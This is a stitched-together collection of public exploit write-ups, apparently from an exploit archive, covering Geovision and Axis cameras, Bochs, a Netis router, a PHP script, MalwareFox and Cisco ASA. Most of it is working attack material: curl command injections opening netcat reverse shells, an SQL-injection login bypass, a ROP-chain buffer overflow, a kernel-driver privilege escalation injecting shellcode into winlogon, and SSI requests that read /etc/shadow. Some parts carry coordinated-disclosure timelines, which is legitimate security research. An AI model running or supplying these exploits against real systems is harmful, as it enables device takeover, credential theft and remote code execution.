November 5, 2017: Initiated contact with Geovision
November 6, 2017: Response from Geovision
November 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'
November 8, 2017: Responce from Geovision
November 15, 2017: Reached out to Geovision to offer more time until FD
(due to the easy exploiting and number of vulnerabilities in large number of products)
November 17, 2017: Request from Geovision to have time to end of January 2018
November 18, 2017: Agreed to FD date of February 1, 2018
November 20, 2017: Received one image for test purposes
November 26, 2017: ACK to Geovision that image looks good
January 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.
January 17, 2018: Received all OK from Geovision, no objections, toghether with thanks for the effort for trying to make Geovision products more safe.
January 17, 2018: Thanked Geoviosion for good cooperation.
February 1, 2018: Full disclosure
-[Unathorized Access]-
1)
PoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)
curl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\&admin_passwordNew=PWN
2)
PoC: Change device WebGUI language back to default
curl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\&submit=Apply
3)
Unathorized upgrade of firmware.
PoC: Reboot the remote device as in 'run_upgrade_prepare'
curl -v "http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi"
URI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm
4)
PoC: Upload of Firmware header for checking correct firmware.
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi" -d "BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjozMDUNCkhJRDoxMTc2LE5hbWU6R1YtQlgzNDAwRSxEb3duVmVyOjMwMw0KSElEOjExNzUsTmFtZTpHVi1CWDE1MDBFLERvd25WZXI6MzAzDQpISUQ6MTEwMSxOYW1lOkdWLVVORkUyNTAzLERvd25WZXI6MzA2DQpISUQ6MTE0NSxOYW1lOkdWLVVOMjYwMCxEb3c="
/var/log/messages
192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] "PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1" 200 25000 "" "curl/7.38.0"
Nov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]
Nov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]
Nov 5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]
5)
Unathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET)
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi"
6)
/PSIA/
Access to GET (read) and PUT (write)
curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
curl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware
curl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset
[...]
List: /PSIA/System/reboot/index
Usage: /PSIA/System/reboot/description
PoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
Full recursive list: /PSIA/indexr
-[Remote Command Execution]-
7)
PoC will create 'tmp/Login.cgi' with '<!--#include file="SYS_CFG"-->', then Dump All Settings,
including login and passwords in clear text by accessing the created Login.htm
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED" ; curl -v "http://192.168.57.20:80/ssi.cgi/tmp/Login.htm"
< HTTP/1.1 200 OK
...
-------------------------------------
- -
- Dump All Settings -
- -
-------------------------------------
...
8)
PoC will pop reverse connect back shell to 192.168.57.1
/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55331.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$
9)
/www/JpegStream.cgi
curl -v "http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\&data_type=1\&attachment=1\&channel=1\&secret=1\&key=PWNED"
$ ncat -vlp 1337
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:55332.
pwd
/www
id
uid=0(root) gid=0(root)
exit
$
Problem(s):
SIiUTIL_GetDecryptData calling popen() "sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;..." without proper sanitation of user input
Note:
Vulnerable tags: 'username', 'password' and 'key'
-[Double free]-
10)
curl -v http://192.168.57.20:80/PSIA/System/configurationData
*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***
-[Stack Overflow]-
11)
/usr/local/thttpd
curl -v "http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en "X";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"
Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x0003889c in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x0 0
r1 0x369650 3577424
r2 0x1 1
r3 0x68 104
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0x3680e8 3571944
sp 0x7ee0fbc8 0x7ee0fbc8
lr 0x3889c 231580
pc 0x49494948 0x49494948
cpsr 0x20000030 536870960
(gdb)
12)
/usr/local/thttpd
curl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en "X"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN
Program received signal SIGSEGV, Segmentation fault.
0x49494948 in ?? ()
(gdb) bt
#0 0x49494948 in ?? ()
#1 0x3e4c4d54 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0xffffffff 4294967295
r1 0x7e963e8c 2123775628
r2 0x0 0
r3 0x242 578
r4 0x41414141 1094795585
r5 0x42424242 1111638594
r6 0x43434343 1128481603
r7 0x44444444 1145324612
r8 0x45454545 1162167621
r9 0x46464646 1179010630
r10 0x47474747 1195853639
r11 0x48484848 1212696648
r12 0xa 10
sp 0x7e983c48 0x7e983c48
lr 0x3e4c4d54 1045187924
pc 0x49494948 0x49494948
cpsr 0x60000030 1610612784
(gdb)
13)
/www/PictureCatch.cgi
curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en "A";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"
[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
14)
/www/Login3gpp.cgi
curl -v "http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en "A";done`BBBB&password=PWNED"
[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---
15)
/www/Login.cgi
curl -v "http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en "A";done`BBBB&password=PWNED"
[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
Note: username and password uses strcpy() and both are vulnerable.
However, 'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow.
Have a nice day
/bashis
[ETX]
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Program description:
# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that
# runs on most popular platforms. It includes emulation of the Intel x86 CPU,
# common I/O devices, and a custom BIOS.
#
# Homepage: http://bochs.sourceforge.net/
# Version: 2.6-5
# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb
import os, subprocess
from struct import pack
# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'`
#
# Program received signal SIGSEGV, Segmentation fault.
#
# [----------------------------------registers-----------------------------------]
# EAX: 0x1
# EBX: 0x41414141 ('AAAA')
# ECX: 0x8167fa0
(<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov
edx,DWORD PTR [esp+0x8])
# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90
(<_ZN13bx_real_sim_cD2Ev>: repz ret)
# ESI: 0x41414141 ('AAAA')
# EDI: 0x41414141 ('AAAA')
# EBP: 0x41414141 ('AAAA')
# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# EIP: 0x41424344 ('DCBA')
# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41424344
# [------------------------------------stack-------------------------------------]
# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2
# 0008| 0xbfffedc8 --> 0x0
# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# 0016| 0xbfffedd0 --> 0x2
# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0
# 0024| 0xbfffedd8 --> 0x0
# 0028| 0xbfffeddc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41424344 in ?? ()
# Padding goes here
junk = 'A'*1200
ropchain = pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '/bin'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276424) # @ .data + 4
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '//sh'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08054cc4) # pop ebx ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x08235733) # pop ecx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x082350b5) # pop edx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804f101) # int 0x80
crafted_buff = junk + ropchain
try:
print("[*] BOCHS 2.6-5 Buffer Overflow - Exploit by Juan Sacco")
print("[*] Running, wait for the shell")
subprocess.call(["bochs-bin", crafted_buff])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "[*] Sorry! BOCHS not found!"
else:
print "[*] Error executing exploit"
raise
# Exploit Title: Netis-WF2419 HTML Injection
# Date: 20/01/2018
# Exploit Author: Sajibe Kanti
# Author Contact :https://twitter.com/@sajibekantibd
# Vendor Homepage: http://www.netis-systems.com/
# Version: Netis-WF2419 , V3.2.41381
# Tested on: Windows 10
# CEV : CVE-2018-6190
HTML Injection in Netis-WF2419
Netis-WF2419 is prone to an HTML-injection vulnerability because it fails
to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or script code could run in the context of the
affected site, potentially allowing the attacker to steal cookie-based
authentication credentials and control how the site is rendered to the
user; other attacks are also possible.
Netis-WF2419 is vulnerable;
Proof of Concept:
1. Go to your wireless router ip (ex. 192.168.0.1)
2. Go to Wireless Settings - tab
3. Now Click MAC Filtering -tab
4.Write MAC Address and in -Description- write (<h1>XSS-PWD</h1>)
5.Click Add
6. Now You Can See HTML Injection
#Solution:
Upgrade Firmware
# Exploit title: Student Profile Management System Script 2.0.6 - Admin
Panel Authentication Bypass
# Dork: "Powered by: i-Net Solution"
# Date: 2018-02-06
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage:
https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/
# Version: 2.0.6
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,Attacker can bypass admin panel Authentication.
# # # # #
# Proof of Concept:
# username : anything
# password : admin' or 'a'='a
# admin panel login : /admin_login.php
/*
Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
Date: 03/02/2018
Author: Souhail Hammou
Vendor Homepage: https://www.malwarefox.com/
Version: 2.74.0.150
Tested on: Windows 7 32-bit / Windows 10 64-bit
CVE: CVE-2018-6606
*/
#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
BOOL RegisterProcessByIOCTL(HANDLE hDevice)
{
DWORD pid, BytesReturned;
/*
IOCTL 0x80002010 registers a process, by its PID, as trusted by the driver. Registered
processes can send special IOCTLs to the driver to do stuff like:
- Enable/Disable real-time protection
- Write to raw disk
- Open full access handles to processes
- ...etc
When a process sends a special IOCTL, the driver checks if that process is registered (as
shown in the disassembly below at address 0000000140010573).
However, when a process sends the IOCTL 0x80002010 to register a process by its PID, the driver
doesn't check to see if the requestor itself is registered (0000000140010553).
That way, any process can register any other process (including itself) with the driver.
.text:000000014001054A mov ebx, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
.text:000000014001054D cmp ebx, 80002010h
.text:0000000140010553 jz short find_ioctl_dispatcher ;jump past the check
[......]
.text:0000000140010573 mov edx, 1
.text:0000000140010578 mov ecx, ebp ; Requestor_PID
.text:000000014001057A call IsProcessRegistered
.text:000000014001057F lea rdx, aMain_c
.text:0000000140010586 test eax, eax
.text:0000000140010588 jnz short loc_1400105C2
.text:000000014001058A mov [rsp+68h+var_38], ebp
.text:000000014001058E lea rax, aProcessidDIsNo
.text:0000000140010595 mov edi, STATUS_ACCESS_DENIED
[......]
.text:00000001400105C8 find_ioctl_dispatcher: ; CODE XREF: sub_1400104BC+97j
.text:00000001400105C8 ; sub_1400104BC+ACj
[......]
.text:0000000140010612 cmp ebx, 80002010h
.text:0000000140010618 jz loc_1400106D7 ; dispatch the IOCTL
*/
pid = GetCurrentProcessId(); //Register our process with the driver
if (!DeviceIoControl(hDevice, 0x80002010, &pid, sizeof(DWORD), NULL, 0, &BytesReturned, NULL))
{
return FALSE;
}
return TRUE;
}
DWORD GetWinlogonPID()
{
DWORD WinlogonPid = 0;
PROCESSENTRY32 ProcessEntry;
ProcessEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
printf("[-] CreateToolhelp32Snapshot failed !\n");
goto ret;
}
if (!Process32First(hSnapshot, &ProcessEntry))
{
printf("[-] Process32First failed !\n");
goto cleanup;
}
do
{
if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe"))
{
WinlogonPid = ProcessEntry.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &ProcessEntry));
cleanup:
CloseHandle(hSnapshot);
ret:
return WinlogonPid;
}
int main(int argc, char** argv)
{
DWORD BytesReturned;
DWORD winlogon_pid;
HANDLE winlogon_handle;
LPVOID RemoteAllocation;
HANDLE hDevice;
printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n");
printf(" Tested on Windows 10 64-bit \n");
printf(" Souhail Hammou \n\n");
printf("[*] Stage 1: Registering the process with the driver by sending IOCTL 0x80002010\n");
hDevice = CreateFile
("\\\\.\\ZemanaAntiMalware",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
{
return 0;
}
if (!RegisterProcessByIOCTL(hDevice))
{
printf("\t[-] Registration Failed !\n");
return 0;
}
printf("\t[+] Process registered.\n[*] Stage 2: \n");
printf("\t[+] Getting Winlogon's PID\n");
winlogon_pid = GetWinlogonPID();
if (!winlogon_pid)
{
printf("\t[-] GetWinlogonPID() failed !\n");
return 0;
}
printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
/*
The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
We use this IOCTL to open a full access handle to winlogon.exe.
Note that this IOCTL can only be sent if the process is registered with the driver.
*/
if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
{
printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
return 0;
}
printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
{
printf("\t[-] VirtualAllocEx failed !\n");
return 0;
}
printf("\t[+] Writing shellcode to allocated memory\n");
/*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
{
printf("\t[-] WriteProcessMemory Failed !\n");
return 0;
}
printf("\t[+] Spawning SYSTEM shell\n");
if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
{
printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
return 0;
}
}
#
# Cisco ASA CVE-2018-0101 Crash PoC
#
# We basically just read:
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf
#
# @zerosum0x0, @jennamagius, @aleph___naught
#
import requests, sys
headers = {}
headers['User-Agent'] = 'Open AnyConnect VPN Agent
v7.08-265-gae481214-dirty'
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['X-Aggregate-Auth'] = '1'
headers['X-Transcend-Version'] = '1'
headers['Accept-Encoding'] = 'identity'
headers['Accept'] = '*/*'
headers['X-AnyConnect-Platform'] = 'linux-64'
headers['X-Support-HTTP-Auth'] = 'false'
headers['X-Pad'] = '0000000000000000000000000000000000000000'
xml = """<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
"""
r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,
allow_redirects=False)
print(r.status_code)
print(r.headers)
print(r.text)
[STX]
Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage.
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (August 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 1, 2017
Full Disclosure: 90 days (due to the large volume of affected devices)
heap: Non-Executable + ASLR
stack: Non-Executable + ASLR
Axis Vulnerability ID: ACV-120444
Vulnerable: MPQT series < v7.20.x/6.50.1.2
Not vulnerable: MPQT series > v7.30/6.50.1.3 (Releases from September to November 2017)
Vulnerable: PACS series < v1.30.0.2/1.60.0/1.10.0.2/1.65.1
Not vulnerable (Releases from October to November 2017):
1. Information leak; All MPQT and PACS (Exist actually from v4.x Firmware)
2. Heap Overflow; MPQT and PACS with Apache Web Server (cannot be triggered with Boa Web Server)
[Note]
The best way to find a fixed FW is to check the Axis advisory and look for 'ACV-120444' in the release notes.
https://www.axis.com/global/en/support/firmware
https://www.axis.com/global/en/support/product-security
Timeline:
August 31, 2017: Initiated contact with Axis
September 1, 2017: Response from Axis
September 5, 2017: ACK of findings from Axis
September 9, 2017: Received first test image from Axis to verify fix
September 28, 2017: Received first advisory draft from Axis
November 15-27, 2017: Coordination with Axis for Full Disclosure
December 1, 2017: Full Disclosure
-[General Information]-
"CGI_decode" in /usr/lib/libcgiparser.so suffers from a bug in the handling URL decode of '%xx'.
The CGI_decode does not check the size of what it is about to decode, it always assumes "%" plus two chars.
By supplying only one single '%', 'CGI_decode' will try to URL decode [% + NULL + Next char], which lead to the return of a longer string than expected as the new string will be read until the next NULL. ([NULL string termination + Next char] are replaced with one '?')
-[Information leakage]-
The "%"" in "GET /index.shtml?size=%"" triggers both "information disclosure" and "heap overflow", depending on how it will be used.
[PoC] (see the breakpoint with the 'AAAA' in the 'Result')
$ echo -en "GET /index.shtml?size=AAAA% HTTP/1.0\n\n" | ncat -v 192.168.57.20 80
[Result]
...
var completePath = "imagepath=" + encodeURIComponent(imagepath) + "&size=AAAA?http_user=anonymous&http_remote_addr=192.168.57.1&http_remote_port=44019&http_port=80&http_scheme_addr=http://http&http_protocol=http&www_authenticate_header=WWW-Authenticate:%20Digest%20realm=%22_%22,%20nonce=%22pP/WaqNeBQA=884e58ea2563f69a14215a33ca02efa68eeca126%22,%20algorithm=MD5,%20qop=%22auth%22";
...
-[Heap Overflow]-
To trigger the heap overflow we need to send ~20KB amount of data that would normally not be accepted by the Web server.
The way around this is to use 'Referer:' and 'x-sessioncookie', where we can send max 8162 bytes in each of them.
[Note]
Without the information leakage bug above, the realloc() will never be triggered regardless how much data is sent.
[PoC]
$ echo -en "GET /index.shtml?size=% HTTP/1.0\nReferer: `for((i=0;i<8162;i++));do echo -en "\x22";done`\nx-sessioncookie: `for((i=0;i<2157;i++));do echo -en "\x22";done`\n\n" | ncat -v 192.168.57.20 80
[Result]
/var/log/info.log
2017-05-08T08:22:23.801+00:00 axis [ INFO ] ssid[3337]: *** Error in `/bin/ssid': realloc(): invalid next size: 0x00bfda50 ***
-[Vulnerable binaries]-
/bin/ssid (Server Side Include Daemon)
/bin/urldecode (URL Command Line Tool)
/usr/bin/dynamic_overlayd (Dynamic Overlay Daemon)
/usr/bin/wsd (Web Service Dispatch Daemon)
/usr/html/axis-cgi/param.cgi (VAPIX Parameter Management)
/usr/lib/libwsevent.so
/usr/lib/libcgiparser.so (<= with the vulnerable function 'CGI_decode()', used in above binaries)
Have a nice day
/bashis
[ETX]
[STX]
Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configure to allow anonymous view
Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
[ETX]
